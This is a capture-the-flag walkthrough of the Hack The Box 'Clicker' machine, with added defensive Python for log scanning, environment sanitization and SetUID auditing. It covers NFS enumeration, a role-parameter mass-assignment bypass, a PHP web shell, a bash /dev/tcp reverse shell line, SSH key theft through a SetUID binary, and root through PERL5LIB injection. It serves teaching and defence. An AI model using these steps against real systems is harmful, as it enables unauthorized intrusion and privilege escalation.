In this post, I would like to share a walkthrough of the Clicker machine from Hack The Box.

This machine is rated Medium on Hack The Box.

What will you gain from the Clicker machine?

For the user flag, you will need a website featuring a game reminiscent of Universal Paperclips. Through meticulous analysis, I’ll uncover a mass assignment vulnerability, employing innovative techniques such as newline injection and SQL injection to circumvent filters and elevate my role to admin status. Subsequently, I’ll exploit a file write vulnerability to establish a web shell and gain execution privileges on the system. To further advance, I’ll identify a SetUID binary belonging to the next user and exploit it to access their SSH key.

As for the root flag, you need to abuse a bug involving the manipulation of Perl environment variables.

For those who want to learn or improve their cybersecurity skills, especially Red Teaming and Blue Teaming, you can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me.

The Academy link can be found at https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvv

Information Gathering on Clicker Machine

Once we have started the VPN connection (the configuration file is downloaded from Hack The Box), we can start.

┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $ nmap -sV -sC 10.10.11.232 -oA initial 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-25 21:32 EDT
Nmap scan report for 10.10.11.232
Host is up (0.16s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89d7393458a0eaa1dbc13d14ec5d5a92 (ECDSA)
|_  256 b4da8daf659cbbf071d51350edd81130 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://clicker.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      39593/udp6  mountd
|   100005  1,2,3      40478/udp   mountd
|   100005  1,2,3      54941/tcp   mountd
|   100005  1,2,3      59945/tcp6  mountd
|   100021  1,3,4      35535/tcp   nlockmgr
|   100021  1,3,4      46513/tcp6  nlockmgr
|   100021  1,3,4      50096/udp   nlockmgr
|   100021  1,3,4      53836/udp6  nlockmgr
|   100024  1          44540/udp   status
|   100024  1          47015/tcp6  status
|   100024  1          51776/udp6  status
|   100024  1          60587/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.14 seconds
┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $ 

Let’s access the website interface

Sadly, there is nothing interesting to investigate further, other than registering a new account and logging in with it.

Therefore, we register a new account and access the website with it, which leads to the interface shown above.

The profile information will look as shown in the screenshot above.

The play interface appears as shown above.

Let's analyze the traffic in Burp Suite; there is nothing odd in the response.

Showmount enumeration on the machine

Therefore, let's run showmount against clicker.htb, which reveals the /mnt/backups export.

First, we need to create a local folder with the same name as the export found by showmount.

Then, let's mount the export onto our attacker machine.

Inside the folder there is a zip file which we can analyze further on our attacker machine.

Let’s copy the file into our attacker’s machine

We should unmount the share afterwards so that it does not affect the machine.

Let’s extract the zip file

There are a lot of PHP files which we can investigate further

Analyze the PHP files on the machine

After analyzing the PHP source code, we find that we can escalate to the admin role within the web application itself.

We can append a parameter such as &role/**/=Admin after the level parameter, as it might grant us administrative access.

At first it did not work, which caught me off guard, but it worked once I logged out and logged back in to the home interface.
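The following is an added example, not code from the Clicker application or from this write-up. It contrasts the blocklist pattern that lets the role/**/ and newline variants through with an allowlist that only accepts known column names, and it runs a small scan over constructed access-log lines to show how the same trick looks to a defender. The /save.php path, the column names "clicks", "level" and "role", and the log lines are all assumptions.

```python
"""Allowlist guard and log check for the mass-assignment issue described above.

Added example, not the Clicker application's code. It assumes a hypothetical
/save.php handler that stores player progress from request parameters; the
column names "clicks", "level" and "role" are assumed.
"""
import re
from urllib.parse import parse_qs

# Columns a player may update about themselves (assumed schema).
ALLOWED_FIELDS = {"clicks", "level"}
# Columns that must never be settable from a request (assumed schema).
PRIVILEGED_FIELDS = {"role"}


def vulnerable_filter(params):
    """Blocklist: drop only keys that are literally 'role'.

    A key such as 'role/**/' or 'role\\n' is not equal to 'role', so it
    survives, and a SQL engine that receives it inside an UPDATE statement
    treats the comment or newline as whitespace after the column name.
    """
    return {k: v for k, v in params.items() if k.lower() != "role"}


def hardened_filter(params):
    """Allowlist: keep only exact matches of known, non-privileged columns."""
    return {k: v for k, v in params.items() if k in ALLOWED_FIELDS}


def canonical_key(key):
    """Strip SQL comments and whitespace so an obfuscated key resolves to the
    column name the database would actually use."""
    key = re.sub(r"/\*.*?\*/", "", key, flags=re.S)
    return re.sub(r"\s+", "", key).lower()


def flag_request(query_string):
    """Return the privileged columns a query string attempts to set."""
    params = parse_qs(query_string, keep_blank_values=True)
    return sorted({canonical_key(k) for k in params} & PRIVILEGED_FIELDS)


# Constructed Apache-style access log lines (not taken from the machine).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Sep/2023:21:40:01 +0000] "GET /save.php?clicks=15&level=2 HTTP/1.1" 302 -',
    '10.0.0.9 - - [25/Sep/2023:21:41:13 +0000] "GET /save.php?clicks=15&level=2&role/**/=Admin HTTP/1.1" 302 -',
    '10.0.0.9 - - [25/Sep/2023:21:42:27 +0000] "GET /save.php?clicks=15&level=2&role%0a=Admin HTTP/1.1" 302 -',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+?)(?:\?(\S*))? HTTP/')


def scan_access_log(lines):
    """Return (line_number, privileged_keys) for every log line whose query
    string tries to set a privileged column, comment/newline tricks included."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match or not match.group(2):
            continue
        keys = flag_request(match.group(2))
        if keys:
            hits.append((number, keys))
    return hits


if __name__ == "__main__":
    tampered = {"clicks": "15", "level": "2", "role/**/": "Admin"}
    print("blocklist keeps:", sorted(vulnerable_filter(tampered)))
    print("allowlist keeps:", sorted(hardened_filter(tampered)))
    for number, keys in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: attempts to set {keys}")
```

The allowlist needs no normalisation at all: a key that is not exactly "clicks" or "level" is simply never written, whatever comments or whitespace it carries. The normalisation lives only in the log scanner, where the goal is the opposite one of recognising every spelling of the same column.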

The interface should be shown in the screenshot above.

However, there is nothing on the Administrator panel.

Therefore, let's place our simple PHP shell after the role parameter.

After that, we export it with the .php file extension.

Finally, we get the command injection working when we run the "id" command.

Let’s start our listener on our attacker’s machine

We can execute a reverse shell command, which makes it easier to get a shell on our machine.

P.S.: We can also use the common bash reverse shell, such as bash -i >& /dev/tcp/<IP>/<PORT> 0>&1, but it must be URL-encoded first.

Enumeration from www-data to user access


Boom! We have successfully retrieved a shell as www-data.

I notice that there are only two users with a bash login shell.

There are a few files owned by Jack that we can investigate further.

One of the files contains some instructions for the web application management tasks.

However, the binary can be easily read as usual.

Let's check the extension of the binary.

As a result, we should download the binary to our machine.

As shown in the screenshot above, the download is successful.

We can also analyze the binary with the strings command.

The output shows a MySQL command which we can run on the machine.

I didn't expect the MySQL command to work, but let's continue down this path before trying a different one.

There are a few databases in MySQL, but clicker catches my attention more than the others.

There are a few players stored in the database, but this could be a rabbit hole.

It looks promising when I execute the command above.

At last, we manage to retrieve an SSH private key which we can use to access the machine.

We can try logging in as the user we found earlier, jack, with the SSH private key, and it works.

We can read the user flag by typing the command “cat user.txt”

Escalating to Root Privileges


As usual, we can run the basic enumeration commands to look for an interesting file, which in this case is the monitor.sh file.

From my understanding of the bash script's source, we can abuse PERL5LIB, which can be read about here.

We can use the command shown on that page to execute the command injection on the machine.

As shown in the screenshot above, /bin/bash has not yet been given the SetUID permission needed to escalate to root.

Therefore, let's give the bash binary the SetUID permission so that we can escalate to root.

As shown above, the bash binary has been given the SetUID permission, highlighted in red.

Finally, we can escalate to root access.

We can read the root flag by typing the “cat root.txt” command
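As an added example (not the machine's monitor.sh or any code from this write-up), the block below shows the defensive side of this step: a wrapper that strips PERL5LIB and related variables before a privileged script runs Perl, and an audit that lists SetUID files so that a shell such as /bin/bash carrying that bit is reported. The variable list, the shell names and the /usr/bin scan path are assumptions.

```python
"""Environment sanitization and a SetUID audit for the root path above.

Added example, not the Clicker machine's monitor.sh. It assumes a privileged
script that invokes Perl and would otherwise inherit its caller's
environment; the wrapper strips the variables Perl and the dynamic loader
honour, and the audit lists SetUID files so a shell given that bit stands out.
"""
import os
import stat
import subprocess

# Variables that change what a Perl program loads or what the loader maps in.
# A privileged script must not take these from an unprivileged caller
# (assumed list; extend it for other interpreters as needed).
DANGEROUS_ENV = ("PERL5LIB", "PERLLIB", "PERL5OPT", "PERL5DB",
                 "LD_PRELOAD", "LD_LIBRARY_PATH")

# Login shells that should never carry the SetUID bit (assumed list).
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def sanitized_env(env):
    """Return a copy of env without the override variables and with PATH
    pinned to system directories."""
    clean = {k: v for k, v in env.items() if k not in DANGEROUS_ENV}
    clean["PATH"] = "/usr/sbin:/usr/bin:/sbin:/bin"
    return clean


def run_privileged(argv, env=None):
    """Run argv the way a privileged wrapper should: with a sanitized copy of
    the caller's environment instead of the environment as inherited."""
    source = os.environ if env is None else env
    return subprocess.run(argv, env=sanitized_env(dict(source)),
                          capture_output=True, text=True, check=False)


def setuid_entries(entries):
    """Pure check over (path, st_mode) pairs: return the regular files that
    carry the SetUID bit."""
    return sorted(path for path, mode in entries
                  if stat.S_ISREG(mode) and mode & stat.S_ISUID)


def setuid_shells(paths):
    """Narrow a SetUID list to interpreters that hand out a full shell."""
    return sorted(p for p in paths if os.path.basename(p) in SHELLS)


def scan_setuid(root):
    """Collect (path, st_mode) for every file under root and apply the check.
    lstat is used so symlinks are not followed."""
    entries = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                entries.append((path, os.lstat(path).st_mode))
            except OSError:
                continue
    return setuid_entries(entries)


if __name__ == "__main__":
    result = run_privileged(["/bin/sh", "-c", 'echo "PERL5LIB=${PERL5LIB:-unset}"'],
                            env={"PERL5LIB": "/tmp/attacker-controlled", "HOME": "/root"})
    print(result.stdout.strip())
    found = scan_setuid("/usr/bin")
    print(f"{len(found)} SetUID files under /usr/bin; shells: {setuid_shells(found)}")
```

Running scan_setuid over the system directories on a schedule and diffing the result against a known baseline is the simplest way to catch the chmod step above after the fact; a SetUID bash is a change that has no legitimate reason to appear.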
